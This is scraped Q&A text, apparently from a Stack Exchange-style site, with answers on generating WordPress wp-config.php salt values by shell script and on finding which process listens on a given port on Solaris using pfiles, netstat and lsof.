file_start=$(mktemp) || exit 1
file_end=$(mktemp) || exit 1
salt=$(mktemp) || exit 1
function find_line {
    # returns the first line number in the file which contains the text
    # program exits if text is not found
    # $1 : text to search for
    # $2 : file in which to search
    # $3 (optional) : line at which to start the search
    line=$(tail -n +${3:-1} $2 | grep -nm 1 $1 | cut -f1 -d:)
    [ -z "$line" ] && exit 1
    echo $(($line + ${3:-1} - 1))
}
line=$(find_line "/**##+" "$file")
line=$(find_line "\*/" "$file" "$line")
head -n $line $file > $file_start
line=$(find_line "/**##-\*/" "$file" "$line")
tail -n +$line $file > $file_end
curl -Ls https://api.wordpress.org/secret-key/1.1/salt/ > $salt
(cat $file_start $salt; echo; cat $file_end) > $file
exit 0
Strings containing single asterisks, such as "*/" and "/**#@-*/", want to expand to directory lists, so that is why those asterisks are escaped.
Here's a pure bash approach. This does not depend on wordpress.org.
I converted the original wp_generate_password() function used by WordPress to generate salt.
#!/bin/bash
set -e

#
# Generates a random password drawn from the defined set of characters.
# Inspired by WordPress function https://developer.wordpress.org/reference/functions/wp_generate_password/
#
# Parameters
# ----------
# $length
#     (int) (Optional) Length of password to generate.
#     Default value: 12
# $special_chars
#     (bool) (Optional) Whether to include standard special characters.
#     Default value: true
# $extra_special_chars
#     (bool) (Optional) Whether to include other special characters. Used when generating secret keys and salts.
#     Default value: false
#
function wp_generate_password() {
    # Args
    length="$(test $1 && echo $1 || echo 12)"
    special_chars="$(test $2 && echo $2 || echo 1)"
    extra_special_chars="$(test $3 && echo $3 || echo 0)"

    chars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    [[ $special_chars != 0 ]] && chars="$chars"'!@#$%^&*()'
    [[ $extra_special_chars != 0 ]] && chars="$chars"'-_ []{}<>~`+=,.;:/?|'

    password=''
    for i in $(seq 1 $length); do
        password="${password}${chars:$(( RANDOM % ${#chars} )):1}"
    done
    echo "$password"
}
You can then just run SALT="$(wp_generate_password 64 1 1)".
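For instance, to emit a complete block of define() lines with it (a sketch; the generated charset contains no single quotes, so the quoting here is safe):
for KEY in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
    printf "define('%s', '%s');\n" "$KEY" "$(wp_generate_password 64 1 1)"
done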
Update
I just published a standalone script to generate WP salt values. You can generate the salt values by running ./wp-generate-salt.sh.
If the wordpress.org API-generated SALT values are not necessary for your use case, you can use pwgen to generate the keys on the server and insert those into wp-config.php.
for i in {1..8} ;do unique_key="`pwgen -1 -s 64`";sudo sed -i "0,/put your unique phrase here/s/put your unique phrase here/$unique_key/" /srv/www/wordpress/wp-config.php; done
You may need to fix the ownership of the file after using sudo. You can use a command similar to this for changing the ownership.
chown www-data:www-data /srv/www/wordpress/wp-config.php

What process is listening on a certain port on Solaris?

So I log into a Solaris box, try to start Apache, and find that there is already a process listening on port 80, and it's not Apache. Our boxes don't have lsof installed, so I can't query with that. I guess I could do:
pfiles `ls /proc` | less
and look for "port: 80", but if anyone has a better solution, I'm all ears! Even better if I can look for the listening process without being root. I'm open to both shell and C solutions; I wouldn't mind having a little custom executable to carry with me for the next time this comes up.
Updated: I'm talking about generic installs of Solaris for which I am not the administrator (although I do have superuser access), so installing things from the freeware disk isn't an option. Obviously neither is using Linux-specific extensions to fuser, netstat, or other tools. So far, running pfiles on all processes seems to be the best solution, unfortunately. If that remains the case, I'll probably post an answer with some slightly more efficient code than the clip above.
I found this script somewhere. I don't remember where, but it works for me:
#!/bin/ksh
line='---------------------------------------------'
pids=$(/usr/bin/ps -ef | sed 1d | awk '{print $2}')
if [ $# -eq 0 ]; then
    read ans?"Enter port you would like to know pid for: "
else
    ans=$1
fi
for f in $pids
do
    /usr/proc/bin/pfiles $f 2>/dev/null | /usr/xpg4/bin/grep -q "port: $ans"
    if [ $? -eq 0 ]; then
        echo $line
        echo "Port: $ans is being used by PID:\c"
        /usr/bin/ps -ef -o pid -o args | egrep -v "grep|pfiles" | grep $f
    fi
done
exit 0
Edit: Here is the original source:
[Solaris] Which process is bound to a given port ?
Here's a one-liner:
ps -ef| awk '{print $2}'| xargs -I '{}' sh -c 'echo examining process {}; pfiles {}| grep 80'
'echo examining process PID' will be printed before each search, so once you see an output referencing port 80, you'll know which process is holding the handle.
Alternatively use:
ps -ef| grep $USER|awk '{print $2}'| xargs -I '{}' sh -c 'echo examining process {}; pfiles {}| grep 80'
Since 'pfiles' might not like that you're trying to access other users' processes, unless you're root of course.
Mavroprovato's answer reports more than just the listening ports. Listening ports are sockets without a peer. The following Perl program reports only the listening ports. It works for me on SunOS 5.10.
#! /usr/bin/env perl
##
## Search the processes which are listening on the given port.
##
## For SunOS 5.10.
##
use strict;
use warnings;
die "Port missing" unless $#ARGV >= 0;
my $port = int($ARGV[0]);
die "Invalid port" unless $port > 0;
my @pids;
map { push @pids, $_ if $_ > 0; } map { int($_) } `ls /proc`;
foreach my $pid (@pids) {
open (PF, "pfiles $pid 2>/dev/null |")
|| warn "Can not read pfiles $pid";
$_ = <PF>;
my $fd;
my $type;
my $sockname;
my $peername;
my $report = sub {
if (defined $fd) {
if (defined $sockname && ! defined $peername) {
print "$pid $type $sockname\n"; } } };
while (<PF>) {
if (/^\s*(\d+):.*$/) {
&$report();
$fd = int ($1);
undef $type;
undef $sockname;
undef $peername; }
elsif (/(SOCK_DGRAM|SOCK_STREAM)/) { $type = $1; }
elsif (/sockname: AF_INET[6]? (.*) port: $port/) {
$sockname = $1; }
elsif (/peername: AF_INET/) { $peername = 1; } }
&$report();
close (PF); }
#!/usr/bin/bash
# This is a little script based on the "pfiles" solution that prints the PID and PORT.
pfiles `ls /proc` 2>/dev/null | awk "/^[^ \\t]/{smatch=\$0;next}/port:[ \\t]*${1}/{print smatch, \$0}{next}"
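Save it as, say, portpid (the name is arbitrary), make it executable, and pass the port number as the first argument:
chmod +x portpid
./portpid 80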
From Solaris 11.2 onwards you can indeed do this with the netstat command; the -u switch is what you are looking for.
If you are on a lower version of Solaris then, as others have pointed out, the Solaris way of doing this is some kind of script wrapper around the pfiles command. Beware though that pfiles halts the process for a split second in order to inspect it. For 99.9% of processes this is unimportant. Unfortunately we have a process that will dump core if it is hit with a pfiles command, so we are a bit cautious about using it. Your situation may be totally different; if you are in the 99.9%, you can safely use pfiles.
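On 11.2 or later, something like the following should show the listener along with its PID (a sketch; -a and -n are the usual netstat flags, but check your man page for how -u formats its output):
netstat -an -u | grep '\.80 '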
netstat on Solaris will not tell you this, nor will older versions of lsof, but if you download and build/install a newer version of lsof, this can tell you that.
$ lsof -v
lsof version information:
revision: 4.85
latest revision: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/
latest FAQ: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/FAQ
latest man page: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/lsof_man
configuration info: 64 bit kernel
constructed: Fri Mar 7 10:32:54 GMT 2014
constructed by and on: user@hostname
compiler: gcc
compiler version: 3.4.3 (csl-sol210-3_4-branch+sol_rpath)
8<- - - - ***SNIP*** - - -
With this you can use the -i option:
$ lsof -i:22
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 521 root 3u IPv6 0xffffffff89c67580 0t0 TCP *:ssh (LISTEN)
sshd 5090 root 3u IPv6 0xffffffffa8668580 0t322598 TCP host.domain.com:ssh->21.43.65.87:52364 (ESTABLISHED)
sshd 5091 johngh 4u IPv6 0xffffffffa8668580 0t322598 TCP host.domain.com:ssh->21.43.65.87:52364 (ESTABLISHED)
Which shows you exactly what you're asking for.
I had a problem yesterday with a crashed Jetty (Java) process, which only left 2 files in its /proc/[PID] directory (psinfo and usage).
pfiles failed to find the process (because the data it needed was not there).
lsof found it for me.
You might not want to, but your best bet is to grab the sunfreeware CD and install lsof.
Other than that, yes you can grovel around in /proc with a shell script.
I think the first answer is the best. I wrote my own shell script developing this idea:
#!/bin/sh
if [ $# -ne 1 ]
then
    echo "Syntax:\n\t"
    echo " $0 {port to search in processes}"
    exit
else
    MYPORT=$1
    for i in `ls /proc`
    do
        pfiles $i | grep port | grep "port: $MYPORT" > /dev/null
        if [ $? -eq 0 ]
        then
            echo " Port $MYPORT found in process $i !!!\n\n"
            echo "Details\n\t"
            pfiles $i | grep port | grep "port: $MYPORT"
            echo "\n\t"
            echo "Process detail: \n\t"
            ps -ef | grep $i | grep -v grep
        fi
    done
fi
Most probably Sun's administrative server.
It's usually bundled along with Sun's directory server and a few other webmin-ish tools that are in the default installation.
This is sort of an indirect approach, but you could see if a website loads in your web browser of choice from whatever is running on port 80. Or you could telnet to port 80 and see if you get a response that gives you a clue as to what is running on that port, so you can go shut it down. Since port 80 is the default port for HTTP traffic, chances are there is some sort of HTTP server running there by default, but there's no guarantee.
If you have access to netstat, that can do precisely that.
